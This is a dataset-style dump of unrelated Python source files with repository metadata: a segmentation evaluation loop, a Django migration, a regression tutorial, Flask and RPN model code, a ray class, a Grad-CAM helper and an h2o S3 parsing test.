    """Evaluate the model on the validation loader.

    :returns: (avg loss, mIoU, mAcc, allAcc, avg top1, avg top5)
    """
    if main_process():
        logger.info('>>>>>>>>>>>>>>>> Start Evaluation >>>>>>>>>>>>>>>>')
    batch_time = AverageMeter()
    data_time = AverageMeter()
    loss_meter = AverageMeter()
    intersection_meter = AverageMeter()
    union_meter = AverageMeter()
    target_meter = AverageMeter()
    top1_meter = AverageMeter()
    top5_meter = AverageMeter()
    # Test-time augmentation pipeline (only horizontal flip enabled).
    test_time_transforms = tta.Compose(
        [
            tta.HorizontalFlip(),
            # tta.VerticalFlip(),
            # tta.Rotate90(angles=[0, 90, 180]),
        ]
    )
    model.eval()
    end = time.time()
    for i, (input, target, domain) in enumerate(val_loader):
        data_time.update(time.time() - end)
        input = input.cuda(non_blocking=True)
        target = target.cuda(non_blocking=True)
        domain = domain.cuda(non_blocking=True)
        # Average the model outputs over the TTA variants.
        tta_outputs = []
        for transformer in test_time_transforms:
            augmented_image = transformer.augment_image(input)
            with torch.no_grad():
                output, output_domain = model(augmented_image)
            tta_outputs.append(output.detach().cpu().numpy().tolist())
        output = np.mean(tta_outputs, axis=0)
        output = torch.tensor(output).cuda(non_blocking=True)
        loss = criterion(output, target)
        # NOTE(review): the two lines below recompute output/loss on the raw
        # input and OVERWRITE the TTA result just computed above, making the
        # whole TTA loop dead work -- confirm which path is intended.
        output, output_domain = model(input)
        loss = criterion(output, target)
        top1, top5 = cal_accuracy(output, target, topk=(1, 5))
        n = input.size(0)
        if args.multiprocessing_distributed:
            # Average loss/accuracy across processes, weighted by batch size.
            with torch.no_grad():
                loss, top1, top5 = loss.detach() * n, top1 * n, top5 * n
                count = target.new_tensor([n], dtype=torch.long)
                dist.all_reduce(loss), dist.all_reduce(top1), dist.all_reduce(top5), dist.all_reduce(count)
                n = count.item()
                loss, top1, top5 = loss / n, top1 / n, top5 / n
        loss_meter.update(loss.item(), n), top1_meter.update(top1.item(), n), top5_meter.update(top5.item(), n)
        output = output.max(1)[1]
        intersection, union, target = intersectionAndUnionGPU(output, target, args.classes, args.ignore_label)
        if args.multiprocessing_distributed:
            dist.all_reduce(intersection), dist.all_reduce(union), dist.all_reduce(target)
        intersection, union, target = intersection.cpu().numpy(), union.cpu().numpy(), target.cpu().numpy()
        intersection_meter.update(intersection), union_meter.update(union), target_meter.update(target)
        accuracy = sum(intersection_meter.val) / (sum(target_meter.val) + 1e-10)
        batch_time.update(time.time() - end)
        end = time.time()
        if ((i + 1) % args.print_freq == 0) and main_process():
            logger.info('Test: [{}/{}] '
                        'Data {data_time.val:.3f} ({data_time.avg:.3f}) '
                        'Batch {batch_time.val:.3f} ({batch_time.avg:.3f}) '
                        'Loss {loss_meter.val:.4f} ({loss_meter.avg:.4f}) '
                        'Accuracy {accuracy:.4f} '
                        'Acc@1 {top1.val:.3f} ({top1.avg:.3f}) '
                        'Acc@5 {top5.val:.3f} ({top5.avg:.3f}).'.format(i + 1, len(val_loader),
                                                                        data_time=data_time,
                                                                        batch_time=batch_time,
                                                                        loss_meter=loss_meter,
                                                                        accuracy=accuracy,
                                                                        top1=top1_meter,
                                                                        top5=top5_meter))
    iou_class = intersection_meter.sum / (union_meter.sum + 1e-10)
    accuracy_class = intersection_meter.sum / (target_meter.sum + 1e-10)
    mIoU = np.mean(iou_class)
    mAcc = np.mean(accuracy_class)
    allAcc = sum(intersection_meter.sum) / (sum(target_meter.sum) + 1e-10)
    if main_process():
        logger.info(
            'Val result: mIoU/mAcc/allAcc/top1/top5 {:.4f}/{:.4f}/{:.4f}/{:.4f}/{:.4f}.'.format(mIoU, mAcc, allAcc,
                                                                                                top1_meter.avg,
                                                                                                top5_meter.avg))
        for i in range(args.classes):
            logger.info('Class_{} Result: iou/accuracy {:.4f}/{:.4f}.'.format(i, iou_class[i], accuracy_class[i]))
        logger.info('<<<<<<<<<<<<<<<<< End Evaluation <<<<<<<<<<<<<<<<<')
    return loss_meter.avg, mIoU, mAcc, allAcc, top1_meter.avg, top5_meter.avg
if __name__ == '__main__':
    # Guarded entry point so multiprocessing spawn can re-import this module
    # without re-running training.
    main()
| [
"cbjg395@gmail.com"
] | cbjg395@gmail.com |
35e280fd151a401ebfceaf55c144d82f9cf6005d | 9981ca5a21e4187a74e57320bc138b1c46dabe45 | /parroquialista/migrations/0001_initial.py | 056ef2ec6d824c30f2a50bf22275a3e647b982cd | [] | no_license | ceag235/ParroquiaWeb | f3c44760d090ed085b02a580b8cee5219f385b1b | 72d050ffe0ac729de6e9f95f2310c0a85a2da577 | refs/heads/master | 2021-09-02T10:21:31.062116 | 2018-01-01T21:04:45 | 2018-01-01T21:04:45 | 115,822,670 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 743 | py | # -*- coding: utf-8 -*-
# Generated by Django 1.9 on 2017-12-01 20:51
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
    """Auto-generated initial migration: creates the Parroquia (parish) table."""
    # First migration of the app, so there is nothing to depend on.
    initial = True
    dependencies = [
    ]
    operations = [
        migrations.CreateModel(
            name='Parroquia',
            fields=[
                # Auto-incrementing integer primary key.
                ('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
                ('nombre', models.CharField(max_length=200)),
                ('direccion', models.CharField(max_length=200)),
                # NOTE(review): latitude/longitude are stored as strings
                # rather than DecimalField -- no numeric queries possible.
                ('latitud', models.CharField(max_length=20)),
                ('longitud', models.CharField(max_length=20)),
            ],
        ),
    ]
| [
"cesar.acosta@gmail.com"
] | cesar.acosta@gmail.com |
7032f31c624cbe3832c6516d669ce2246a315b3b | cfc36873e9e166212d15add1b7c79610f956968c | /multiplelinearregression1.py | 5bf2b0423c9fcf3b4bbe6857e6d788d24a77d8f4 | [] | no_license | BaluAnush18/Machine-Learning-Basics | 8727f4ea7dfdae8064793a526de9c48aeda1596a | 1ec7e9f6d32b00b978d452f3a0866c5bbd490976 | refs/heads/main | 2023-05-13T23:07:48.642036 | 2021-05-25T08:44:52 | 2021-05-25T08:44:52 | 370,621,290 | 2 | 0 | null | null | null | null | UTF-8 | Python | false | false | 5,154 | py | #SAME AS LINEAR REGRESSION BUT HAS MANY COMBINATIONS OF b & x.
#LINEAR REGRESSION -> y = b0 + b1*x1
#MULTIPLE REGRESSION -> y = b0 + b1*x1 + b2*x2 + b3*x3 + bn*xn
#ASSUMPTIONS OF LINEAR REGRESSION:
#Linearity, Homoscedasticity, Multivariate Normality, Independence of Errors, Lack of Multicollinearity.
#DUMMY VARIABLES:
#In this case, Profit is the dependent variable. So b0 is profit.
#b1*x1 -> R&D Spend ; b2*x2 -> Admin ; b3*x3 -> Marketing ; But a problem arises when we encounter categorical variables.
#To overcome categorical variable problem, we need to create a dummy variable.
#Eg: For values in NY column, put 1 -> present & 0 elsewhere. Similarly, for California put 1 -> present & 0 where it is absent.
#So regression equation becomes b4*D1 (name of Dummy variable column).
#DUMMY VARIABLE TRAP:
#We cannot include 2 dummy variable at the same time.
#Because we are basically duplicating the variables. This is because D2 = 1 - D1.
#The phenomenon where one or more variables predict another -> Multiple Linearity.
#As a result, the model cannot distinguish between dummy variables and results in dummy variable trap.
#And also we cannot include a constant(b0) and both the dummy variables at the same time in the same equation.(Refer math)
#STATISTICAL SIGNIFICANCE:
#H0 : This is a fair coin ; H1 : This is not a fair coin.
#Suppose we flip the coin and get tails continuously; the probability of getting a tail every time is 0.5 -> 0.25 -> 0.12 -> 0.06 -> 0.03 -> 0.01.
#Suppose we do this for 33 days, there is a rare chance of us getting the above combination.
#We are assuming the hypothesis is true in the given universe.
#The combination is called P-Value.
#We get the P-Value in H0 is 0.5 -> 0.25 -> 0.12 -> 0.06 -> 0.03 -> 0.01.
#But in H1 the values would be 100%.
#We assume that we are getting an uneasy feeling and growing suspicious about our model. This threshold is alpha, and we assume it to be 0.05 in our case.
#Once the value goes below alpha, it is unlikely to see this random and it is unlikely to happen, it is right to reject that hypothesis.
#P-Value depends on experiment and results. Ideally it is set to 95%.
#BUILDING A MODEL:
#5 methods: All-in, Backward Elimination, Forward Selection, Bi-directional Elimination, Score Comparison.
#Step wise regression -> Backward Elimination, Forward Selection, Bi-directional Elimination. (default : Bi-directional Elimination).
#All-in : To let all the variables in once you are sure that all the variables are true to your knowledge.
#Backward Elimination :
# Steps ->
# 1. Select a significance level to stay in the model.
# 2. Fit the full model with all possible predictors.
# 3. Consider the predictor with highest P-Value. If P > SL -> Step 4. Else FIN. (FIN -> Finish. Model is ready)
# 4. Remove the predictor.
# 5. Fit the model without this variable. Repeat till P > SL fails.
#Forward Elimination :
# 1. Select a significance level to enter the model.
# 2. Fit all the simple regression models y ~ xn. Select the one with lowest P-Value.
# 3. Keep this variable and fit all the possible models with one extra predictor added to one(s) you already have.
# 4. Consider the predictor with lowest P-Value. If P < SL, goto step 3, otherwise FIN.(FIN -> Keep a step back).
#Bi-directional Elimination:
# 1. Select a significance level to enter and to stay in the model.
# 2. Perform the next step of Forward Selection. (New variables must have: P < SLENTER to enter).
# 3. Perform all steps of Backward Elimination. (Old variables must have: P < SLSTAY to stay).
# 4. Keep repeating until you cannot eliminate a variable or add. No new variables can enter and no old variables can exit. FIN.
#Score Comparison:
# 1. Select a criterion of goodness and fit.
# 2. Construct all possible regression models.((2^n)-1) total combinations.
# 3. Select the one with best criterion. FIN.
import numpy as np
import pandas as pd
import matplotlib.pyplot as plt
dataset = pd.read_csv('50_Startups.csv')
# Features: every column except the last; target: the last column (Profit).
x = dataset.iloc[:, :-1].values
y = dataset.iloc[:, -1].values
from sklearn.compose import ColumnTransformer
from sklearn.preprocessing import OneHotEncoder
# One-hot encode the categorical column at index 3 (State); leave the
# remaining numeric columns untouched.
ct = ColumnTransformer( transformers= [('encoding', OneHotEncoder(), [3])],remainder='passthrough' )
x=np.array(ct.fit_transform(x))
from sklearn.model_selection import train_test_split
x_train, x_test, y_train, y_test = train_test_split(x, y, test_size=0.2, random_state=0)
#In Multiple Linear Regression, there is no need to apply a feature scaling as the coefficient terms such as b1, b2 will compensate and come on the same scale.
from sklearn.linear_model import LinearRegression  # ordinary least squares; it does NOT do P-value based feature selection on its own.
regression=LinearRegression()
regression.fit(x_train,y_train)
y_pred = regression.predict(x_test)
np.set_printoptions(precision=2)
# Print predicted vs. actual profits side by side: reshape both vectors into
# columns and concatenate along axis=1 (horizontally).
print(np.concatenate((y_pred.reshape(len(y_pred),1),y_test.reshape(len(y_test),1)),1))
#To display the real profits and predicted profits, we use concatenate which concats either vertically or horizontally.
#1->concat horizontally. 0->vertically
"noreply@github.com"
] | noreply@github.com |
f839f9696b4fbf844d94d553f489d414e67a92e9 | 098ae2441ad0bbdb79212ee7462c8b522fcdaa07 | /config.py | c1db2b09a49c43b942e56bacd9ff1ef98133a65c | [] | no_license | liuwar/fg_show_web | 9e8db73f1b6c5b0fff98b9b8f76f8b3bbaa0cb0b | 772b54fe6fd4256af97177ea83aab2716db42b70 | refs/heads/main | 2023-04-29T07:24:09.589821 | 2021-05-19T02:18:22 | 2021-05-19T02:18:22 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,626 | py | from os import path
class Config:
    """Base Flask configuration shared by all environments."""
    SECRET_KEY = ''
    # DATABASE
    SQLALCHEMY_DATABASE_URI = ''
    SQLALCHEMY_TRACK_MODIFICATIONS = False
    # UPLOAD
    MAX_CONTENT_LENGTH = 10 * 1024 * 1024
    # BUG FIX: the original expression
    #   path.join(path.dirname(path.abspath(__file__))),"/app/static/image"
    # evaluated to a *tuple* (dir, "/app/static/image") because the second
    # component sat outside the join() call; and even inside join() a leading
    # "/" would discard the project directory. Join the pieces properly so the
    # upload destination is a single path under the project root.
    UPLOADED_IMAGEFILES_DEST = path.join(path.dirname(path.abspath(__file__)), "app", "static", "image")
    DEBUG = True
class ProductionConfig(Config):
    """Production settings; database/redis URLs are filled in at deploy time."""
    SQLALCHEMY_DATABASE_URI = ""
    REDIS_URL = ""
class DevelopmentConfig(Config):
    """Local development settings; database URL is filled in locally."""
    SQLALCHEMY_DATABASE_URI = ""
# Environment name -> configuration class, used by the app factory.
# NOTE(review): "test" maps to ProductionConfig rather than a dedicated
# testing configuration -- confirm this is intentional.
config = {
    "development": DevelopmentConfig,
    "test":ProductionConfig,
    "product":ProductionConfig,
    'default':DevelopmentConfig
}
# Video category table keyed by numeric category id. Each entry carries the
# display title (Chinese), the CSS "active" marker toggled by the UI, and the
# id again as a string code. The ids and titles match Bilibili's partition
# scheme (presumably -- verify against the upstream API).
classify = {
    0:{  # "no filter" / all categories
        "title":"不限",
        "active":"",
        "code":'0'
    },
    155:{  # Fashion
        "title":"时尚",
        "active":"",
        "code":'155'
    },
    160:{  # Lifestyle
        "title":"生活",
        "active":"",
        "code":'160'
    },
    1:{  # Animation
        "title":"动画",
        "active":"",
        "code":'1'
    },
    3:{  # Music
        "title":"音乐",
        "active":"",
        "code":'3'
    },
    129:{  # Dance
        "title":"舞蹈",
        "active":"",
        "code":'129'
    },
    4:{  # Gaming
        "title":"游戏",
        "active":"",
        "code":'4'
    },
    36:{  # Knowledge
        "title":"知识",
        "active":"",
        "code":'36'
    },
    188:{  # Digital / tech
        "title":"数码",
        "active":"",
        "code":'188'
    },
    202:{  # labelled "咨询" (consultation) -- possibly a typo for 资讯 (news); verify
        "title":"咨询",
        "active":"",
        "code":'202'
    },
    119:{  # Kichiku / remix
        "title":"鬼畜",
        "active":"",
        "code":'119'
    },
    165:{  # Advertising
        "title":"广告",
        "active":"",
        "code":'165'
    },
    5:{  # Entertainment
        "title":"娱乐",
        "active":"",
        "code":'5'
    },
    181:{  # Film & TV
        "title":"影视",
        "active":"",
        "code":'181'
    },
    13:{  # Anime series
        "title":"番剧",
        "active":"",
        "code":'13'
    },
    167:{  # Chinese original animation
        "title":"国创",
        "active":"",
        "code":'167'
    },
    177:{  # Documentary
        "title":"纪录片",
        "active":"",
        "code":'177'
    },
    23:{  # Movies
        "title":"电影",
        "active":"",
        "code":'23'
    },
    11:{  # TV dramas
        "title":"电视剧",
        "active":"",
        "code":'11'
    },
}
"572179341@qq.com"
] | 572179341@qq.com |
bea94d93e49502d92c4c31df5a75a23b238d7292 | b67d739367a6789c01be22f169498fbda1dcbbc3 | /models/rpn.py | 590d039d7835d14df06cd4bd5197e9c0bb864093 | [] | no_license | luoyi9340/faster_rcnn | e5ac6e68283bfb7a5b3c7d25160490269f030e03 | 8d0c6960f54404cb0a19872a44a94a57d9961108 | refs/heads/master | 2023-03-03T00:37:30.566775 | 2021-02-16T03:18:47 | 2021-02-16T03:18:47 | 327,672,917 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,674 | py | # -*- coding: utf-8 -*-
'''
RPN模型
@author: luoyi
Created on 2021年1月5日
'''
import tensorflow as tf
import models
import utils.conf as conf
from models.layers.rpn.models import RPNNet
from models.layers.rpn.losses import RPNLoss
from models.layers.rpn.metrics import RPNMetricCls, RPNMetricReg
from models.layers.rpn.preprocess import takeout_sample_array, all_positives_from_fmaps
from models.layers.rpn.nms import nms
from models.layers.resnet.models import ResNet34, ResNet50
# RPN模型
class RPNModel(models.AModel):
    def __init__(self,
                 cnns=None,
                 cnns_name=conf.RPN.get_cnns(),
                 rpn=None,
                 learning_rate=conf.RPN.get_train_learning_rate(),
                 scaling=conf.CNNS.get_feature_map_scaling(),
                 K=conf.ROIS.get_K(),
                 cnns_base_channel_num=conf.CNNS.get_base_channel_num(),
                 train_cnns=True,
                 train_rpn=True,
                 loss_lamda=10,
                 is_build=True,
                 input_shape=(None, conf.IMAGE_HEIGHT, conf.IMAGE_WEIGHT, 3),
                 **kwargs):
        '''
        @param cnns: pre-built backbone model, used to continue training an
                     already trained model; mutually exclusive with cnns_name
                     and takes priority over it
        @param cnns_name: which backbone to build (resnet34 | resnet50)
        @param rpn: a previously trained RPN head, for continued training
        @param scaling: feature-map down-scaling factor of the backbone
        @param K: number of anchors per feature-map position
        @param cnns_base_channel_num: base channel count for the backbone
        @param train_cnns: whether the backbone layers participate in training
        @param train_rpn: whether the RPN head participates in training
        @param loss_lamda: weight of the regression term in the RPN loss
        @param is_build: build the underlying keras model immediately with input_shape
        @param input_shape: (batch, H, W, 3) shape used when is_build is True
        '''
        # Stash configuration; the actual layers are created in assembling(),
        # which the AModel base class invokes.
        self.__scaling = scaling
        self.__K = K
        self.__cnns_base_channel_num = cnns_base_channel_num
        self.__cnns_name = cnns_name
        self.cnns = cnns
        self.rpn = rpn
        self.__train_cnns = train_cnns
        self.__train_rpn = train_rpn
        self.__loss_lamda = loss_lamda
        super(RPNModel, self).__init__(name='rpn', learning_rate=learning_rate, **kwargs)
        if (is_build):
            self._net.build(input_shape=input_shape)
            pass
        pass
# 设置cnns层是否参与运算
    def set_cnns_trainable(self, training):
        # Enable/disable gradient updates for the backbone layers.
        self.cnns.trainable = training
        pass
# 设置rpn层是否参与运算
    def set_rpn_trainable(self, training):
        # Enable/disable gradient updates for the RPN head.
        self.rpn.trainable = training
        pass
# 优化器
    def optimizer(self, net, learning_rate=0.9):
        # Optimizer factory used by the training framework (Adam).
        # NOTE(review): `net` is unused here, and the 0.9 default looks more
        # like a momentum value than a learning rate -- callers presumably
        # always pass the configured learning rate explicitly; verify.
        return tf.optimizers.Adam(learning_rate=learning_rate)
# 损失函数
def loss(self):
return RPNLoss(loss_lamda=self.__loss_lamda)
# 评价函数
def metrics(self):
return [RPNMetricCls(), RPNMetricReg()]
# 模型名称
def model_name(self):
return self.name + "_" + self.__cnns_name
# 装配模型
def assembling(self, net):
# 选择CNNsNet
if (self.cnns is None):
# 如果是resnet34
if (self.__cnns_name == 'resnet34'):
self.cnns = ResNet34(training=self.__train_cnns, scaling=self.__scaling, base_channel_num=self.__cnns_base_channel_num)
pass
# 默认resnet50
else:
self.cnns = ResNet50(training=self.__train_cnns, scaling=self.__scaling, base_channel_num=self.__cnns_base_channel_num)
pass
pass
# 创建RPNNet
if (self.rpn is None):
self.rpn = RPNNet(training=self.__train_rpn, input_shape=self.cnns.get_output_shape(), K=self.__K, loss_lamda=self.__loss_lamda)
pass
# 装配模型
net.add(self.cnns)
net.add(self.rpn)
pass
# 测试
def test(self, X, batch_size=2):
'''测试
@param X: 测试数据(num, h, w, 3)
@param batch_size: 批量
@return: 特征图(num, h, w, 6, K)
'''
fmaps = self._net.predict(X, batch_size=batch_size)
return fmaps
# 统计分类数据
def test_cls(self, fmaps, ymaps):
'''统计分类数据
@param fmaps: Tensor(num, h, w, 6, K) test函数返回的特征图
@param ymaps: Numpy(num, h, w, 6, K) 与fmaps对应的标签特征图
@return: TP, TN, FP, TN, P, N
'''
y_true = tf.convert_to_tensor(ymaps, dtype=tf.float32)
y_pred = tf.convert_to_tensor(fmaps, dtype=tf.float32)
anchors = takeout_sample_array(y_true, y_pred)
return RPNMetricCls().tp_tn_fp_tf_p_n(anchors)
# 计算回归的平均绝对误差
def test_reg(self, fmaps, ymaps):
'''计算回归的平均绝对误差
@param fmaps: numpy (batch_size, h, w, 6, K) test函数返回的特征图
@param ymaps: numpy (batch_size, num, 10) 与fmaps对应的标签特征图
@return: MAE
'''
y_true = tf.convert_to_tensor(ymaps, dtype=tf.float32)
y_pred = tf.convert_to_tensor(fmaps, dtype=tf.float32)
anchors = takeout_sample_array(y_true, y_pred)
return RPNMetricReg().mean_abs_error(y_true, anchors)
# 生成全部建议框
def candidate_box_from_fmap(self,
fmaps,
threshold_prob=conf.RPN.get_nms_threshold_positives(),
threshold_iou=conf.RPN.get_nms_threshold_iou(),
K=conf.ROIS.get_K(),
roi_areas = conf.ROIS.get_roi_areas(),
roi_scales = conf.ROIS.get_roi_scales()):
'''根据模型输出的fmaps生成全部候选框(所有被判定为前景的anchor,过nms)
@param fmaps: numpy(num, h, w, 6, K)
@param threshold_prob: 判定为前景的阈值
@param threshold_iou: NMS中用到的IoU阈值。超过此阈值的anchor会被判定为重叠的anchor过滤掉
@param K: 特征图中每个像素点对应多少个anchor(roi_areas * roi_scales的组合)
@param roi_areas: anchor面积比划分(1:1时的长宽值)
@param roi_scales: anchor长宽比划分
@return: [numpy(num, 6)...]
[正样本概率, xl,yl(左上点), xr,yr(右下点), 区域面积]
'''
# 取fmaps中生成的所有被判定为前景的anchor
anchors = all_positives_from_fmaps(fmaps, threshold=threshold_prob, K=K, roi_areas=roi_areas, roi_scales=roi_scales)
return nms(anchors, threshold=threshold_iou)
pass
| [
"irenebritney@192.168.31.84"
] | irenebritney@192.168.31.84 |
3f7f0533a77371bd9afca6f9b3db560d4bd1bbc5 | ff6a258429d73f3536528decaf595ab749b17084 | /tools/ray.py | e9a5b54fc8416a899c144e0b623e812095452459 | [] | no_license | xavihart/CG-RayTracer | 1a3051317f868332e6213eed560d41f1c6619c4c | 29218a32ae0436d23a238bfe70f00727f91a7799 | refs/heads/master | 2022-12-10T03:12:23.256644 | 2020-09-15T15:40:00 | 2020-09-15T15:40:00 | 273,280,718 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 609 | py | from .vec3 import *
class ray:
    """A parametric ray: p(t) = a + b * t.

    a: origin point (vec3)
    b: direction vector (vec3)
    t: time stamp carried by the ray (used e.g. for motion blur)
    """
    def __init__(self, a_=None, b_=None, t_=0):
        # note : a_ and b_ must be vec3
        # Bug fix: the old defaults `a_=vec3(0, 0, 0)` were evaluated once at
        # function-definition time, so every default-constructed ray shared
        # the SAME vec3 instances; mutating one ray's origin mutated them all.
        # None sentinels create a fresh zero vector per call instead.
        self.a = vec3(0, 0, 0) if a_ is None else a_
        self.b = vec3(0, 0, 0) if b_ is None else b_
        self.t = t_
    def origin(self):
        return self.a
    def direction(self):
        return self.b
    def point_at_parameter(self, t):
        # Point reached after travelling t units along the direction.
        return self.a + self.b.mul(t)
    def time(self):
        return self.t
if __name__ == "__main__":
    # Small manual check: print two sample points along a demo ray.
    origin = vec3(1,2,3)
    direction = vec3(1,1,1)
    demo = ray(origin, direction)
    for t in (2, 3):
        point = demo.point_at_parameter(t)
        point.show()
| [
"xavihart@sjtu.edu.cn"
] | xavihart@sjtu.edu.cn |
a8691c22467753872cc6ea65d244c12c491dc815 | 9743d5fd24822f79c156ad112229e25adb9ed6f6 | /xai/brain/wordbase/nouns/_nationality.py | 4e1dcbd9aa26fd3af3fbdc1264cb9f070b10fdb7 | [
"MIT"
] | permissive | cash2one/xai | de7adad1758f50dd6786bf0111e71a903f039b64 | e76f12c9f4dcf3ac1c7c08b0cc8844c0b0a104b6 | refs/heads/master | 2021-01-19T12:33:54.964379 | 2017-01-28T02:00:50 | 2017-01-28T02:00:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 413 | py |
#calss header
class _NATIONALITY():
def __init__(self,):
self.name = "NATIONALITY"
self.definitions = [u'the official right to belong to a particular country: ', u'a group of people of the same race, religion, traditions, etc.: ']
self.parents = []
self.childen = []
self.properties = []
self.jsondata = {}
self.specie = 'nouns'
def run(self, obj1 = [], obj2 = []):
return self.jsondata
| [
"xingwang1991@gmail.com"
] | xingwang1991@gmail.com |
2fe768dff1923ab14087efa6799cddc20e67ef62 | 0f662b816ef6c54e557a4ef19c16a7ed15e96ad1 | /attention/helpers.py | 7d6db7d3183b810b444a56d9dfed92e1ac7f7406 | [] | no_license | xiaowodaweiwang/practical-ml | c23781dcf3420adc1ffe07b14e8deb05e5d94150 | 1297ccb7f1220f2e7205575dd50ce372c6e018d8 | refs/heads/master | 2022-12-26T06:27:40.705938 | 2020-05-21T01:02:32 | 2020-05-21T01:02:32 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,547 | py | import cv2
import tensorflow as tf
from tensorflow import keras
import numpy as np
# Short aliases used throughout this module.
K = keras.backend  # Keras backend ops (argmax / mean / max / maximum below)
Model = keras.models.Model  # functional-API model constructor
def overlay_attn(model, x, img_path, filepath='./attention/attn.jpg'):
    """Write a Grad-CAM style attention overlay for input `x` to `filepath`.

    Computes a class-activation heatmap from the gradients of the winning
    class score w.r.t. the last VGG16 conv layer ('block5_conv3'), resizes
    it to the image at `img_path`, and blends the two with OpenCV.

    model: Keras model containing a VGG16-style layer named 'block5_conv3'.
    x: preprocessed input batch for `model` (assumes batch size 1, since
       only predictions[0] is inspected -- TODO confirm against callers).
    img_path: path of the original (unpreprocessed) image used for display.
    filepath: output path for the blended overlay image.
    """
    # https://github.com/Vadikus/practicalDL/blob/master/01%20-%2005%20-%20Attention%20of%20ConvNet%20(VGG16).ipynb
    last_vgg_conv_layer = model.get_layer('block5_conv3')
    # Secondary model exposing both the conv feature maps and the prediction.
    heatmap_model = Model([model.inputs], [last_vgg_conv_layer.output, model.output])
    # Get gradient of the winner class w.r.t. the output of the (last) conv. layer
    # https://stackoverflow.com/questions/58322147/how-to-generate-cnn-heatmaps-using-built-in-keras-in-tf2-0-tf-keras
    with tf.GradientTape() as gtape:
        conv_output, predictions = heatmap_model(x)
        loss = predictions[:, K.argmax(predictions[0])]
        grads = gtape.gradient(loss, conv_output)
        pooled_grads = K.mean(grads, axis=(0, 1, 2))
    # Weight each feature map by its pooled gradient and average (Grad-CAM),
    # then clip negatives and normalize to [0, 1].
    heatmap = tf.reduce_mean(tf.multiply(pooled_grads, conv_output), axis=-1)
    heatmap = K.maximum(heatmap, 0)
    max_heat = K.max(heatmap)
    if max_heat == 0:
        # Avoid division by zero when the heatmap is all zeros.
        max_heat = 1e-10
    heatmap /= max_heat
    # Drop the batch dimension and add a channel axis: (h, w, 1).
    heatmap = tf.reshape(heatmap, shape=(heatmap.shape[1], heatmap.shape[2], 1))
    heatmap = heatmap.numpy()
    img = cv2.imread(img_path)
    # cv2.resize expects (width, height), hence the swapped axes.
    img_shape = (img.shape[1], img.shape[0])
    heatmap = cv2.resize(heatmap, img_shape)
    heatmap = np.uint8(255 * heatmap)
    heatmap = cv2.applyColorMap(heatmap, cv2.COLORMAP_JET)
    # Blend: 40% colorized heatmap on top of the original image.
    superimposed_img = heatmap * 0.4 + img
    cv2.imwrite(filepath, superimposed_img)
| [
"larryschirmer@gmail.com"
] | larryschirmer@gmail.com |
6178613ae1de09e96e249662e9fbc8df8c9503f8 | 7353050d53f6b3fbb0561a719908bef630143ff6 | /telBot_env/bin/easy_install | 4d7fb214fedc93b87d6fbec4f89e17c42a344ac0 | [] | no_license | GoldenRed/telBot | 5754b6314c2774d8575d07ffec1d3dbb8d3c1699 | a2b0b884bb8a849ddcfb8c62a79aa464ffc881af | refs/heads/master | 2022-12-13T18:14:46.461823 | 2021-04-05T06:54:11 | 2021-04-05T06:54:11 | 211,549,491 | 0 | 0 | null | 2022-12-08T06:39:58 | 2019-09-28T19:09:57 | Python | UTF-8 | Python | false | false | 271 | #!/mnt/c/Users/dbz00/Sync/telBot/telBot_env/bin/python3
# -*- coding: utf-8 -*-
import re
import sys
from setuptools.command.easy_install import main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(main())
| [
"yared94@gmail.com"
] | yared94@gmail.com | |
8da1f2b67b46206e3835fdfee41f7365ac844f46 | 577f03954ec69ed82eaea32c62c8eba9ba6a01c1 | /py/testdir_ec2_only/test_parse_covtype20x_s3.py | d6207e11b1f8763b5cd9fdd1466e72b472d7c03f | [
"Apache-2.0"
] | permissive | ledell/h2o | 21032d784a1a4bb3fe8b67c9299f49c25da8146e | 34e271760b70fe6f384e106d84f18c7f0adb8210 | refs/heads/master | 2020-02-26T13:53:01.395087 | 2014-12-29T04:14:29 | 2014-12-29T04:14:29 | 24,823,632 | 1 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,962 | py | import unittest, sys, random, time
sys.path.extend(['.','..','../..','py'])
import h2o, h2o_cmd, h2o_browse as h2b, h2o_import as h2i
class Basic(unittest.TestCase):
    """Cloud-lifecycle test (Python 2): repeatedly import and parse
    covtype20x.data from S3 against h2o clouds built with increasing
    JVM heap sizes."""
    def tearDown(self):
        # After each test, scan the h2o sandbox logs for errors.
        h2o.check_sandbox_for_errors()
    @classmethod
    def setUpClass(cls):
        print "Will build clouds with incrementing heap sizes and import folder/parse"
    @classmethod
    def tearDownClass(cls):
        # the node state is gone when we tear down the cloud, so pass the ignore here also.
        h2o.tear_down_cloud(sandboxIgnoreErrors=True)
    def test_parse_covtype20x_loop_s3(self):
        # Dataset location inside the S3 bucket.
        bucket = 'home-0xdiag-datasets'
        importFolderPath = "standard"
        csvFilename = "covtype20x.data"
        csvPathname = importFolderPath + "/" + csvFilename
        timeoutSecs = 500  # per-parse timeout
        trialMax = 3  # parses per cloud configuration
        # Build a fresh cloud per heap size and parse the file several times.
        for tryHeap in [4,12]:
            print "\n", tryHeap,"GB heap, 1 jvm per host, import folder,", \
                "then parse 'covtype20x.data'"
            h2o.init(java_heap_GB=tryHeap)
            # don't raise exception if we find something bad in h2o stdout/stderr?
            h2o.nodes[0].sandboxIgnoreErrors = True
            for trial in range(trialMax):
                hex_key = csvFilename + ".hex"
                start = time.time()
                parseResult = h2i.import_parse(bucket=bucket, path=csvPathname, schema='s3', hex_key=hex_key,
                    timeoutSecs=timeoutSecs, retryDelaySecs=10, pollTimeoutSecs=60)
                elapsed = time.time() - start
                print "parse result:", parseResult['destination_key']
                print "Trial #", trial, "completed in", elapsed, "seconds.", \
                    "%d pct. of timeout" % ((elapsed*100)/timeoutSecs)
                # Remove the parsed key so the next trial starts clean.
                removeKeyResult = h2o.nodes[0].remove_key(key=hex_key)
            h2o.tear_down_cloud()
            # sticky ports? wait a bit.
            time.sleep(5)
if __name__ == '__main__':
    # h2o's unittest wrapper: handles h2o-specific CLI args, then runs tests.
    h2o.unit_main()
| [
"kevin@0xdata.com"
] | kevin@0xdata.com |
